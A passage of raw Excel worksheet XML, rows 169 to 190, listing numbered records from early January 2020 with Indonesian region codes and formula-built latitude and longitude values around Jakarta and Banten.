        <v>10673864</v>
      </c>
      <c r="V169" s="5" t="s">
        <v>14613</v>
      </c>
      <c r="W169" s="5">
        <v>-616782</v>
      </c>
      <c r="X169" t="s">
        <v>18425</v>
      </c>
      <c r="Y169" t="str">
        <f t="shared" si="2"/>
        <v>-6.16782,106.73864</v>
      </c>
    </row>
    <row r="170" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A170">
        <v>101573</v>
      </c>
      <c r="B170" s="1">
        <v>43832</v>
      </c>
      <c r="C170" s="2">
        <v>0.46887731481481482</v>
      </c>
      <c r="D170" t="s">
        <v>22</v>
      </c>
      <c r="E170" t="s">
        <v>23</v>
      </c>
      <c r="F170" t="s">
        <v>848</v>
      </c>
      <c r="G170" t="s">
        <v>849</v>
      </c>
      <c r="H170" t="s">
        <v>26</v>
      </c>
      <c r="I170" t="s">
        <v>624</v>
      </c>
      <c r="J170" t="s">
        <v>444</v>
      </c>
      <c r="L170" t="s">
        <v>850</v>
      </c>
      <c r="M170">
        <v>3174020005</v>
      </c>
      <c r="N170">
        <v>3174020</v>
      </c>
      <c r="O170">
        <v>3174</v>
      </c>
      <c r="P170">
        <v>31</v>
      </c>
      <c r="Q170" t="s">
        <v>30</v>
      </c>
      <c r="R170" t="s">
        <v>31</v>
      </c>
      <c r="S170" t="s">
        <v>32</v>
      </c>
      <c r="T170" t="s">
        <v>33</v>
      </c>
      <c r="U170" s="5">
        <v>10677375</v>
      </c>
      <c r="V170" s="5" t="s">
        <v>14614</v>
      </c>
      <c r="W170" s="5">
        <v>-617440</v>
      </c>
      <c r="X170" t="s">
        <v>18426</v>
      </c>
      <c r="Y170" t="str">
        <f t="shared" si="2"/>
        <v>-6.17440,106.77375</v>
      </c>
    </row>
    <row r="171" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A171">
        <v>101613</v>
      </c>
      <c r="B171" s="1">
        <v>43832</v>
      </c>
      <c r="C171" s="2">
        <v>0.46643518518518517</v>
      </c>
      <c r="D171" t="s">
        <v>85</v>
      </c>
      <c r="E171" t="s">
        <v>23</v>
      </c>
      <c r="F171" t="s">
        <v>851</v>
      </c>
      <c r="G171" t="s">
        <v>852</v>
      </c>
      <c r="H171" t="s">
        <v>26</v>
      </c>
      <c r="I171" t="s">
        <v>710</v>
      </c>
      <c r="J171" t="s">
        <v>37</v>
      </c>
      <c r="K171" t="s">
        <v>853</v>
      </c>
      <c r="L171" t="s">
        <v>854</v>
      </c>
      <c r="M171">
        <v>3671012001</v>
      </c>
      <c r="N171">
        <v>3671012</v>
      </c>
      <c r="O171">
        <v>3671</v>
      </c>
      <c r="P171">
        <v>36</v>
      </c>
      <c r="Q171" t="s">
        <v>759</v>
      </c>
      <c r="R171" t="s">
        <v>760</v>
      </c>
      <c r="S171" t="s">
        <v>201</v>
      </c>
      <c r="T171" t="s">
        <v>171</v>
      </c>
      <c r="U171" s="5">
        <v>10669904</v>
      </c>
      <c r="V171" s="5" t="s">
        <v>14615</v>
      </c>
      <c r="W171" s="5">
        <v>-622195</v>
      </c>
      <c r="X171" t="s">
        <v>18427</v>
      </c>
      <c r="Y171" t="str">
        <f t="shared" si="2"/>
        <v>-6.22195,106.69904</v>
      </c>
    </row>
    <row r="172" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A172">
        <v>101654</v>
      </c>
      <c r="B172" s="1">
        <v>43832</v>
      </c>
      <c r="C172" s="2">
        <v>0.48225694444444445</v>
      </c>
      <c r="D172" t="s">
        <v>22</v>
      </c>
      <c r="E172" t="s">
        <v>23</v>
      </c>
      <c r="F172" t="s">
        <v>855</v>
      </c>
      <c r="G172" t="s">
        <v>856</v>
      </c>
      <c r="H172" t="s">
        <v>26</v>
      </c>
      <c r="I172" t="s">
        <v>857</v>
      </c>
      <c r="J172" t="s">
        <v>858</v>
      </c>
      <c r="L172" t="s">
        <v>859</v>
      </c>
      <c r="M172">
        <v>3175010003</v>
      </c>
      <c r="N172">
        <v>3175010</v>
      </c>
      <c r="O172">
        <v>3175</v>
      </c>
      <c r="P172">
        <v>31</v>
      </c>
      <c r="Q172" t="s">
        <v>545</v>
      </c>
      <c r="R172" t="s">
        <v>546</v>
      </c>
      <c r="S172" t="s">
        <v>547</v>
      </c>
      <c r="T172" t="s">
        <v>33</v>
      </c>
      <c r="U172" s="5">
        <v>10677856</v>
      </c>
      <c r="V172" s="5" t="s">
        <v>14616</v>
      </c>
      <c r="W172" s="5">
        <v>-613057</v>
      </c>
      <c r="X172" t="s">
        <v>18428</v>
      </c>
      <c r="Y172" t="str">
        <f t="shared" si="2"/>
        <v>-6.13057,106.77856</v>
      </c>
    </row>
    <row r="173" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A173">
        <v>101685</v>
      </c>
      <c r="B173" s="1">
        <v>43832</v>
      </c>
      <c r="C173" s="2">
        <v>0.49244212962962958</v>
      </c>
      <c r="D173" t="s">
        <v>22</v>
      </c>
      <c r="E173" t="s">
        <v>23</v>
      </c>
      <c r="F173" t="s">
        <v>860</v>
      </c>
      <c r="G173" t="s">
        <v>861</v>
      </c>
      <c r="H173" t="s">
        <v>26</v>
      </c>
      <c r="I173" t="s">
        <v>862</v>
      </c>
      <c r="J173" t="s">
        <v>863</v>
      </c>
      <c r="L173" t="s">
        <v>864</v>
      </c>
      <c r="M173">
        <v>3175010003</v>
      </c>
      <c r="N173">
        <v>3175010</v>
      </c>
      <c r="O173">
        <v>3175</v>
      </c>
      <c r="P173">
        <v>31</v>
      </c>
      <c r="Q173" t="s">
        <v>545</v>
      </c>
      <c r="R173" t="s">
        <v>546</v>
      </c>
      <c r="S173" t="s">
        <v>547</v>
      </c>
      <c r="T173" t="s">
        <v>33</v>
      </c>
      <c r="U173" s="5">
        <v>10678242</v>
      </c>
      <c r="V173" s="5" t="s">
        <v>14617</v>
      </c>
      <c r="W173" s="5">
        <v>-613805</v>
      </c>
      <c r="X173" t="s">
        <v>18429</v>
      </c>
      <c r="Y173" t="str">
        <f t="shared" si="2"/>
        <v>-6.13805,106.78242</v>
      </c>
    </row>
    <row r="174" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A174">
        <v>101692</v>
      </c>
      <c r="B174" s="1">
        <v>43832</v>
      </c>
      <c r="C174" s="2">
        <v>0.49587962962962967</v>
      </c>
      <c r="D174" t="s">
        <v>22</v>
      </c>
      <c r="E174" t="s">
        <v>23</v>
      </c>
      <c r="F174" t="s">
        <v>865</v>
      </c>
      <c r="G174" t="s">
        <v>866</v>
      </c>
      <c r="H174" t="s">
        <v>26</v>
      </c>
      <c r="I174" t="s">
        <v>867</v>
      </c>
      <c r="J174" t="s">
        <v>728</v>
      </c>
      <c r="L174" t="s">
        <v>868</v>
      </c>
      <c r="M174">
        <v>3174040001</v>
      </c>
      <c r="N174">
        <v>3174040</v>
      </c>
      <c r="O174">
        <v>3174</v>
      </c>
      <c r="P174">
        <v>31</v>
      </c>
      <c r="Q174" t="s">
        <v>730</v>
      </c>
      <c r="R174" t="s">
        <v>377</v>
      </c>
      <c r="S174" t="s">
        <v>32</v>
      </c>
      <c r="T174" t="s">
        <v>33</v>
      </c>
      <c r="U174" s="5">
        <v>10678056</v>
      </c>
      <c r="V174" s="5" t="s">
        <v>14618</v>
      </c>
      <c r="W174" s="5">
        <v>-617038</v>
      </c>
      <c r="X174" t="s">
        <v>18430</v>
      </c>
      <c r="Y174" t="str">
        <f t="shared" si="2"/>
        <v>-6.17038,106.78056</v>
      </c>
    </row>
    <row r="175" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A175">
        <v>101694</v>
      </c>
      <c r="B175" s="1">
        <v>43832</v>
      </c>
      <c r="C175" s="2">
        <v>0.49604166666666666</v>
      </c>
      <c r="D175" t="s">
        <v>22</v>
      </c>
      <c r="E175" t="s">
        <v>23</v>
      </c>
      <c r="F175" t="s">
        <v>869</v>
      </c>
      <c r="G175" t="s">
        <v>870</v>
      </c>
      <c r="H175" t="s">
        <v>26</v>
      </c>
      <c r="I175" t="s">
        <v>181</v>
      </c>
      <c r="J175" t="s">
        <v>871</v>
      </c>
      <c r="L175" t="s">
        <v>872</v>
      </c>
      <c r="M175">
        <v>3174040001</v>
      </c>
      <c r="N175">
        <v>3174040</v>
      </c>
      <c r="O175">
        <v>3174</v>
      </c>
      <c r="P175">
        <v>31</v>
      </c>
      <c r="Q175" t="s">
        <v>730</v>
      </c>
      <c r="R175" t="s">
        <v>377</v>
      </c>
      <c r="S175" t="s">
        <v>32</v>
      </c>
      <c r="T175" t="s">
        <v>33</v>
      </c>
      <c r="U175" s="5">
        <v>10678250</v>
      </c>
      <c r="V175" s="5" t="s">
        <v>14619</v>
      </c>
      <c r="W175" s="5">
        <v>-617729</v>
      </c>
      <c r="X175" t="s">
        <v>18431</v>
      </c>
      <c r="Y175" t="str">
        <f t="shared" si="2"/>
        <v>-6.17729,106.78250</v>
      </c>
    </row>
    <row r="176" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A176">
        <v>101701</v>
      </c>
      <c r="B176" s="1">
        <v>43832</v>
      </c>
      <c r="C176" s="2">
        <v>0.49799768518518522</v>
      </c>
      <c r="D176" t="s">
        <v>22</v>
      </c>
      <c r="E176" t="s">
        <v>23</v>
      </c>
      <c r="F176" t="s">
        <v>873</v>
      </c>
      <c r="G176" t="s">
        <v>874</v>
      </c>
      <c r="H176" t="s">
        <v>26</v>
      </c>
      <c r="I176" t="s">
        <v>166</v>
      </c>
      <c r="J176" t="s">
        <v>875</v>
      </c>
      <c r="M176">
        <v>3174070002</v>
      </c>
      <c r="N176">
        <v>3174070</v>
      </c>
      <c r="O176">
        <v>3174</v>
      </c>
      <c r="P176">
        <v>31</v>
      </c>
      <c r="Q176" t="s">
        <v>621</v>
      </c>
      <c r="R176" t="s">
        <v>84</v>
      </c>
      <c r="S176" t="s">
        <v>32</v>
      </c>
      <c r="T176" t="s">
        <v>33</v>
      </c>
      <c r="U176" s="5">
        <v>10673321</v>
      </c>
      <c r="V176" s="5" t="s">
        <v>14620</v>
      </c>
      <c r="W176" s="5">
        <v>-617112</v>
      </c>
      <c r="X176" t="s">
        <v>18432</v>
      </c>
      <c r="Y176" t="str">
        <f t="shared" si="2"/>
        <v>-6.17112,106.73321</v>
      </c>
    </row>
    <row r="177" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A177">
        <v>101706</v>
      </c>
      <c r="B177" s="1">
        <v>43832</v>
      </c>
      <c r="C177" s="2">
        <v>0.49914351851851851</v>
      </c>
      <c r="D177" t="s">
        <v>22</v>
      </c>
      <c r="E177" t="s">
        <v>23</v>
      </c>
      <c r="F177" t="s">
        <v>876</v>
      </c>
      <c r="G177" t="s">
        <v>877</v>
      </c>
      <c r="H177" t="s">
        <v>26</v>
      </c>
      <c r="I177" t="s">
        <v>878</v>
      </c>
      <c r="J177" t="s">
        <v>648</v>
      </c>
      <c r="L177" t="s">
        <v>879</v>
      </c>
      <c r="M177">
        <v>3174020005</v>
      </c>
      <c r="N177">
        <v>3174020</v>
      </c>
      <c r="O177">
        <v>3174</v>
      </c>
      <c r="P177">
        <v>31</v>
      </c>
      <c r="Q177" t="s">
        <v>30</v>
      </c>
      <c r="R177" t="s">
        <v>31</v>
      </c>
      <c r="S177" t="s">
        <v>32</v>
      </c>
      <c r="T177" t="s">
        <v>33</v>
      </c>
      <c r="U177" s="5">
        <v>10677840</v>
      </c>
      <c r="V177" s="5" t="s">
        <v>14621</v>
      </c>
      <c r="W177" s="5">
        <v>-616897</v>
      </c>
      <c r="X177" t="s">
        <v>18433</v>
      </c>
      <c r="Y177" t="str">
        <f t="shared" si="2"/>
        <v>-6.16897,106.77840</v>
      </c>
    </row>
    <row r="178" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A178">
        <v>101708</v>
      </c>
      <c r="B178" s="1">
        <v>43832</v>
      </c>
      <c r="C178" s="2">
        <v>0.50033564814814813</v>
      </c>
      <c r="D178" t="s">
        <v>22</v>
      </c>
      <c r="E178" t="s">
        <v>23</v>
      </c>
      <c r="F178" t="s">
        <v>880</v>
      </c>
      <c r="G178" t="s">
        <v>881</v>
      </c>
      <c r="H178" t="s">
        <v>26</v>
      </c>
      <c r="I178" t="s">
        <v>882</v>
      </c>
      <c r="J178" t="s">
        <v>625</v>
      </c>
      <c r="L178" t="s">
        <v>883</v>
      </c>
      <c r="M178">
        <v>3174070001</v>
      </c>
      <c r="N178">
        <v>3174070</v>
      </c>
      <c r="O178">
        <v>3174</v>
      </c>
      <c r="P178">
        <v>31</v>
      </c>
      <c r="Q178" t="s">
        <v>83</v>
      </c>
      <c r="R178" t="s">
        <v>84</v>
      </c>
      <c r="S178" t="s">
        <v>32</v>
      </c>
      <c r="T178" t="s">
        <v>33</v>
      </c>
      <c r="U178" s="5">
        <v>10671543</v>
      </c>
      <c r="V178" s="5" t="s">
        <v>14622</v>
      </c>
      <c r="W178" s="5">
        <v>-617522</v>
      </c>
      <c r="X178" t="s">
        <v>18434</v>
      </c>
      <c r="Y178" t="str">
        <f t="shared" si="2"/>
        <v>-6.17522,106.71543</v>
      </c>
    </row>
    <row r="179" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A179">
        <v>101711</v>
      </c>
      <c r="B179" s="1">
        <v>43832</v>
      </c>
      <c r="C179" s="2">
        <v>0.50091435185185185</v>
      </c>
      <c r="D179" t="s">
        <v>22</v>
      </c>
      <c r="E179" t="s">
        <v>23</v>
      </c>
      <c r="F179" t="s">
        <v>884</v>
      </c>
      <c r="G179" t="s">
        <v>885</v>
      </c>
      <c r="H179" t="s">
        <v>26</v>
      </c>
      <c r="I179" t="s">
        <v>886</v>
      </c>
      <c r="J179" t="s">
        <v>887</v>
      </c>
      <c r="L179" t="s">
        <v>888</v>
      </c>
      <c r="M179">
        <v>3172090004</v>
      </c>
      <c r="N179">
        <v>3172090</v>
      </c>
      <c r="O179">
        <v>3172</v>
      </c>
      <c r="P179">
        <v>31</v>
      </c>
      <c r="Q179" t="s">
        <v>889</v>
      </c>
      <c r="R179" t="s">
        <v>890</v>
      </c>
      <c r="S179" t="s">
        <v>49</v>
      </c>
      <c r="T179" t="s">
        <v>33</v>
      </c>
      <c r="U179" s="5">
        <v>10689623</v>
      </c>
      <c r="V179" s="5" t="s">
        <v>14623</v>
      </c>
      <c r="W179" s="5">
        <v>-619997</v>
      </c>
      <c r="X179" t="s">
        <v>18435</v>
      </c>
      <c r="Y179" t="str">
        <f t="shared" si="2"/>
        <v>-6.19997,106.89623</v>
      </c>
    </row>
    <row r="180" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A180">
        <v>101723</v>
      </c>
      <c r="B180" s="1">
        <v>43832</v>
      </c>
      <c r="C180" s="2">
        <v>0.50631944444444443</v>
      </c>
      <c r="D180" t="s">
        <v>22</v>
      </c>
      <c r="E180" t="s">
        <v>23</v>
      </c>
      <c r="F180" t="s">
        <v>891</v>
      </c>
      <c r="G180" t="s">
        <v>892</v>
      </c>
      <c r="H180" t="s">
        <v>26</v>
      </c>
      <c r="I180" t="s">
        <v>893</v>
      </c>
      <c r="J180" t="s">
        <v>894</v>
      </c>
      <c r="L180" t="s">
        <v>895</v>
      </c>
      <c r="M180">
        <v>3174020005</v>
      </c>
      <c r="N180">
        <v>3174020</v>
      </c>
      <c r="O180">
        <v>3174</v>
      </c>
      <c r="P180">
        <v>31</v>
      </c>
      <c r="Q180" t="s">
        <v>30</v>
      </c>
      <c r="R180" t="s">
        <v>31</v>
      </c>
      <c r="S180" t="s">
        <v>32</v>
      </c>
      <c r="T180" t="s">
        <v>33</v>
      </c>
      <c r="U180" s="5">
        <v>10677532</v>
      </c>
      <c r="V180" s="5" t="s">
        <v>14624</v>
      </c>
      <c r="W180" s="5">
        <v>-617088</v>
      </c>
      <c r="X180" t="s">
        <v>18436</v>
      </c>
      <c r="Y180" t="str">
        <f t="shared" si="2"/>
        <v>-6.17088,106.77532</v>
      </c>
    </row>
    <row r="181" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A181">
        <v>101727</v>
      </c>
      <c r="B181" s="1">
        <v>43832</v>
      </c>
      <c r="C181" s="2">
        <v>0.50799768518518518</v>
      </c>
      <c r="D181" t="s">
        <v>22</v>
      </c>
      <c r="E181" t="s">
        <v>23</v>
      </c>
      <c r="F181" t="s">
        <v>896</v>
      </c>
      <c r="G181" t="s">
        <v>897</v>
      </c>
      <c r="H181" t="s">
        <v>26</v>
      </c>
      <c r="I181" t="s">
        <v>898</v>
      </c>
      <c r="J181" t="s">
        <v>648</v>
      </c>
      <c r="L181" t="s">
        <v>899</v>
      </c>
      <c r="M181">
        <v>3174020005</v>
      </c>
      <c r="N181">
        <v>3174020</v>
      </c>
      <c r="O181">
        <v>3174</v>
      </c>
      <c r="P181">
        <v>31</v>
      </c>
      <c r="Q181" t="s">
        <v>30</v>
      </c>
      <c r="R181" t="s">
        <v>31</v>
      </c>
      <c r="S181" t="s">
        <v>32</v>
      </c>
      <c r="T181" t="s">
        <v>33</v>
      </c>
      <c r="U181" s="5">
        <v>10677687</v>
      </c>
      <c r="V181" s="5" t="s">
        <v>14625</v>
      </c>
      <c r="W181" s="5">
        <v>-617236</v>
      </c>
      <c r="X181" t="s">
        <v>18437</v>
      </c>
      <c r="Y181" t="str">
        <f t="shared" si="2"/>
        <v>-6.17236,106.77687</v>
      </c>
    </row>
    <row r="182" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A182">
        <v>101729</v>
      </c>
      <c r="B182" s="1">
        <v>43832</v>
      </c>
      <c r="C182" s="2">
        <v>0.5085763888888889</v>
      </c>
      <c r="D182" t="s">
        <v>22</v>
      </c>
      <c r="E182" t="s">
        <v>23</v>
      </c>
      <c r="F182" t="s">
        <v>900</v>
      </c>
      <c r="G182" t="s">
        <v>901</v>
      </c>
      <c r="H182" t="s">
        <v>26</v>
      </c>
      <c r="I182" t="s">
        <v>166</v>
      </c>
      <c r="J182" t="s">
        <v>586</v>
      </c>
      <c r="L182" t="s">
        <v>902</v>
      </c>
      <c r="M182">
        <v>3173050002</v>
      </c>
      <c r="N182">
        <v>3173050</v>
      </c>
      <c r="O182">
        <v>3173</v>
      </c>
      <c r="P182">
        <v>31</v>
      </c>
      <c r="Q182" t="s">
        <v>588</v>
      </c>
      <c r="R182" t="s">
        <v>589</v>
      </c>
      <c r="S182" t="s">
        <v>62</v>
      </c>
      <c r="T182" t="s">
        <v>33</v>
      </c>
      <c r="U182" s="5">
        <v>10686500</v>
      </c>
      <c r="V182" s="5" t="s">
        <v>14568</v>
      </c>
      <c r="W182" s="5">
        <v>-617510</v>
      </c>
      <c r="X182" t="s">
        <v>18382</v>
      </c>
      <c r="Y182" t="str">
        <f t="shared" si="2"/>
        <v>-6.17510,106.86500</v>
      </c>
    </row>
    <row r="183" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A183">
        <v>101739</v>
      </c>
      <c r="B183" s="1">
        <v>43832</v>
      </c>
      <c r="C183" s="2">
        <v>0.51172453703703702</v>
      </c>
      <c r="D183" t="s">
        <v>22</v>
      </c>
      <c r="E183" t="s">
        <v>23</v>
      </c>
      <c r="F183" t="s">
        <v>903</v>
      </c>
      <c r="H183" t="s">
        <v>26</v>
      </c>
      <c r="I183" t="s">
        <v>904</v>
      </c>
      <c r="J183" t="s">
        <v>37</v>
      </c>
      <c r="L183" t="s">
        <v>905</v>
      </c>
      <c r="M183">
        <v>3674070007</v>
      </c>
      <c r="N183">
        <v>3674070</v>
      </c>
      <c r="O183">
        <v>3674</v>
      </c>
      <c r="P183">
        <v>36</v>
      </c>
      <c r="Q183" t="s">
        <v>706</v>
      </c>
      <c r="R183" t="s">
        <v>707</v>
      </c>
      <c r="S183" t="s">
        <v>170</v>
      </c>
      <c r="T183" t="s">
        <v>171</v>
      </c>
      <c r="U183" s="5">
        <v>10668870</v>
      </c>
      <c r="V183" s="5" t="s">
        <v>14626</v>
      </c>
      <c r="W183" s="5">
        <v>-623094</v>
      </c>
      <c r="X183" t="s">
        <v>18438</v>
      </c>
      <c r="Y183" t="str">
        <f t="shared" si="2"/>
        <v>-6.23094,106.68870</v>
      </c>
    </row>
    <row r="184" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A184">
        <v>101741</v>
      </c>
      <c r="B184" s="1">
        <v>43832</v>
      </c>
      <c r="C184" s="2">
        <v>0.51208333333333333</v>
      </c>
      <c r="D184" t="s">
        <v>22</v>
      </c>
      <c r="E184" t="s">
        <v>23</v>
      </c>
      <c r="F184" t="s">
        <v>906</v>
      </c>
      <c r="G184" t="s">
        <v>907</v>
      </c>
      <c r="H184" t="s">
        <v>26</v>
      </c>
      <c r="I184" t="s">
        <v>908</v>
      </c>
      <c r="J184" t="s">
        <v>728</v>
      </c>
      <c r="L184" t="s">
        <v>909</v>
      </c>
      <c r="M184">
        <v>3174040001</v>
      </c>
      <c r="N184">
        <v>3174040</v>
      </c>
      <c r="O184">
        <v>3174</v>
      </c>
      <c r="P184">
        <v>31</v>
      </c>
      <c r="Q184" t="s">
        <v>730</v>
      </c>
      <c r="R184" t="s">
        <v>377</v>
      </c>
      <c r="S184" t="s">
        <v>32</v>
      </c>
      <c r="T184" t="s">
        <v>33</v>
      </c>
      <c r="U184" s="5">
        <v>10678103</v>
      </c>
      <c r="V184" s="5" t="s">
        <v>14627</v>
      </c>
      <c r="W184" s="5">
        <v>-617377</v>
      </c>
      <c r="X184" t="s">
        <v>18439</v>
      </c>
      <c r="Y184" t="str">
        <f t="shared" si="2"/>
        <v>-6.17377,106.78103</v>
      </c>
    </row>
    <row r="185" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A185">
        <v>101746</v>
      </c>
      <c r="B185" s="1">
        <v>43832</v>
      </c>
      <c r="C185" s="2">
        <v>0.51482638888888888</v>
      </c>
      <c r="D185" t="s">
        <v>22</v>
      </c>
      <c r="E185" t="s">
        <v>23</v>
      </c>
      <c r="F185" t="s">
        <v>910</v>
      </c>
      <c r="G185" t="s">
        <v>911</v>
      </c>
      <c r="H185" t="s">
        <v>26</v>
      </c>
      <c r="I185" t="s">
        <v>27</v>
      </c>
      <c r="J185" t="s">
        <v>912</v>
      </c>
      <c r="L185" t="s">
        <v>913</v>
      </c>
      <c r="M185">
        <v>3174040001</v>
      </c>
      <c r="N185">
        <v>3174040</v>
      </c>
      <c r="O185">
        <v>3174</v>
      </c>
      <c r="P185">
        <v>31</v>
      </c>
      <c r="Q185" t="s">
        <v>730</v>
      </c>
      <c r="R185" t="s">
        <v>377</v>
      </c>
      <c r="S185" t="s">
        <v>32</v>
      </c>
      <c r="T185" t="s">
        <v>33</v>
      </c>
      <c r="U185" s="5">
        <v>10678408</v>
      </c>
      <c r="V185" s="5" t="s">
        <v>14628</v>
      </c>
      <c r="W185" s="5">
        <v>-616985</v>
      </c>
      <c r="X185" t="s">
        <v>18440</v>
      </c>
      <c r="Y185" t="str">
        <f t="shared" si="2"/>
        <v>-6.16985,106.78408</v>
      </c>
    </row>
    <row r="186" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A186">
        <v>101770</v>
      </c>
      <c r="B186" s="1">
        <v>43832</v>
      </c>
      <c r="C186" s="2">
        <v>0.52681712962962968</v>
      </c>
      <c r="D186" t="s">
        <v>22</v>
      </c>
      <c r="E186" t="s">
        <v>23</v>
      </c>
      <c r="F186" t="s">
        <v>914</v>
      </c>
      <c r="G186" t="s">
        <v>915</v>
      </c>
      <c r="H186" t="s">
        <v>26</v>
      </c>
      <c r="I186" t="s">
        <v>916</v>
      </c>
      <c r="J186" t="s">
        <v>37</v>
      </c>
      <c r="L186" t="s">
        <v>917</v>
      </c>
      <c r="M186">
        <v>3671020016</v>
      </c>
      <c r="N186">
        <v>3671020</v>
      </c>
      <c r="O186">
        <v>3671</v>
      </c>
      <c r="P186">
        <v>36</v>
      </c>
      <c r="Q186" t="s">
        <v>823</v>
      </c>
      <c r="R186" t="s">
        <v>274</v>
      </c>
      <c r="S186" t="s">
        <v>201</v>
      </c>
      <c r="T186" t="s">
        <v>171</v>
      </c>
      <c r="U186" s="5">
        <v>10670114</v>
      </c>
      <c r="V186" s="5" t="s">
        <v>14629</v>
      </c>
      <c r="W186" s="5">
        <v>-619499</v>
      </c>
      <c r="X186" t="s">
        <v>18441</v>
      </c>
      <c r="Y186" t="str">
        <f t="shared" si="2"/>
        <v>-6.19499,106.70114</v>
      </c>
    </row>
    <row r="187" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A187">
        <v>101790</v>
      </c>
      <c r="B187" s="1">
        <v>43832</v>
      </c>
      <c r="C187" s="2">
        <v>0.53586805555555561</v>
      </c>
      <c r="D187" t="s">
        <v>22</v>
      </c>
      <c r="E187" t="s">
        <v>23</v>
      </c>
      <c r="F187" t="s">
        <v>918</v>
      </c>
      <c r="G187" t="s">
        <v>919</v>
      </c>
      <c r="H187" t="s">
        <v>26</v>
      </c>
      <c r="I187" t="s">
        <v>920</v>
      </c>
      <c r="J187" t="s">
        <v>444</v>
      </c>
      <c r="L187" t="s">
        <v>921</v>
      </c>
      <c r="M187">
        <v>3174020005</v>
      </c>
      <c r="N187">
        <v>3174020</v>
      </c>
      <c r="O187">
        <v>3174</v>
      </c>
      <c r="P187">
        <v>31</v>
      </c>
      <c r="Q187" t="s">
        <v>30</v>
      </c>
      <c r="R187" t="s">
        <v>31</v>
      </c>
      <c r="S187" t="s">
        <v>32</v>
      </c>
      <c r="T187" t="s">
        <v>33</v>
      </c>
      <c r="U187" s="5">
        <v>10677878</v>
      </c>
      <c r="V187" s="5" t="s">
        <v>14630</v>
      </c>
      <c r="W187" s="5">
        <v>-617528</v>
      </c>
      <c r="X187" t="s">
        <v>18375</v>
      </c>
      <c r="Y187" t="str">
        <f t="shared" si="2"/>
        <v>-6.17528,106.77878</v>
      </c>
    </row>
    <row r="188" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A188">
        <v>101797</v>
      </c>
      <c r="B188" s="1">
        <v>43832</v>
      </c>
      <c r="C188" s="2">
        <v>0.53900462962962969</v>
      </c>
      <c r="D188" t="s">
        <v>22</v>
      </c>
      <c r="E188" t="s">
        <v>23</v>
      </c>
      <c r="F188" t="s">
        <v>922</v>
      </c>
      <c r="G188" t="s">
        <v>923</v>
      </c>
      <c r="H188" t="s">
        <v>26</v>
      </c>
      <c r="I188" t="s">
        <v>924</v>
      </c>
      <c r="J188" t="s">
        <v>925</v>
      </c>
      <c r="M188">
        <v>3174070004</v>
      </c>
      <c r="N188">
        <v>3174070</v>
      </c>
      <c r="O188">
        <v>3174</v>
      </c>
      <c r="P188">
        <v>31</v>
      </c>
      <c r="Q188" t="s">
        <v>926</v>
      </c>
      <c r="R188" t="s">
        <v>84</v>
      </c>
      <c r="S188" t="s">
        <v>32</v>
      </c>
      <c r="T188" t="s">
        <v>33</v>
      </c>
      <c r="U188" s="5">
        <v>10673956</v>
      </c>
      <c r="V188" s="5" t="s">
        <v>14631</v>
      </c>
      <c r="W188" s="5">
        <v>-613383</v>
      </c>
      <c r="X188" t="s">
        <v>18369</v>
      </c>
      <c r="Y188" t="str">
        <f t="shared" si="2"/>
        <v>-6.13383,106.73956</v>
      </c>
    </row>
    <row r="189" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A189">
        <v>101812</v>
      </c>
      <c r="B189" s="1">
        <v>43832</v>
      </c>
      <c r="C189" s="2">
        <v>0.57643518518518522</v>
      </c>
      <c r="D189" t="s">
        <v>22</v>
      </c>
      <c r="E189" t="s">
        <v>23</v>
      </c>
      <c r="F189" t="s">
        <v>927</v>
      </c>
      <c r="G189" t="s">
        <v>928</v>
      </c>
      <c r="H189" t="s">
        <v>26</v>
      </c>
      <c r="I189" t="s">
        <v>929</v>
      </c>
      <c r="J189" t="s">
        <v>930</v>
      </c>
      <c r="L189" t="s">
        <v>931</v>
      </c>
      <c r="M189">
        <v>3174070002</v>
      </c>
      <c r="N189">
        <v>3174070</v>
      </c>
      <c r="O189">
        <v>3174</v>
      </c>
      <c r="P189">
        <v>31</v>
      </c>
      <c r="Q189" t="s">
        <v>621</v>
      </c>
      <c r="R189" t="s">
        <v>84</v>
      </c>
      <c r="S189" t="s">
        <v>32</v>
      </c>
      <c r="T189" t="s">
        <v>33</v>
      </c>
      <c r="U189" s="5">
        <v>10672841</v>
      </c>
      <c r="V189" s="5" t="s">
        <v>14632</v>
      </c>
      <c r="W189" s="5">
        <v>-616408</v>
      </c>
      <c r="X189" t="s">
        <v>18442</v>
      </c>
      <c r="Y189" t="str">
        <f t="shared" si="2"/>
        <v>-6.16408,106.72841</v>
      </c>
    </row>
    <row r="190" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A190">
        <v>101813</v>
      </c>
      <c r="B190" s="1">
        <v>43832</v>
      </c>
      <c r="C190" s="2">
        <v>0.58494212962962966</v>
      </c>
      <c r="D190" t="s">
        <v>22</v>
      </c>
      <c r="E190" t="s">
        <v>23</v>
      </c>
      <c r="F190" t="s">
        <v>932</v>
      </c>
      <c r="G190" t="s">
        <v>933</v>
      </c>
      <c r="H190" t="s">
        <v>26</v>
      </c>
      <c r="I190" t="s">
        <v>934</v>
      </c>
      <c r="J190" t="s">
        <v>586</v>
      </c>
      <c r="L190" t="s">
        <v>935</v>
      </c>
      <c r="M190">
        <v>3173050002</v>
      </c>
      <c r="N190">
        <v>3173050</v>
      </c>
      <c r="O190">
        <v>3173</v>
      </c>
      <c r="P190">
        <v>31</v>
      </c>
      <c r="Q190" t="s">
        <v>588</v>
      </c>
      <c r="R190" t="s">
        <v>589</v>
      </c>
      <c r="S190" t="s">
        <v>62</v>
      </c>
      <c r="T190" t="s">
        <v>33</v>
      </c>
      <c r="U190" s="5">
        <v>10686539</v>
      </c>
      <c r="V190" s="5" t="s">
        <v>14555</v>
      </c>
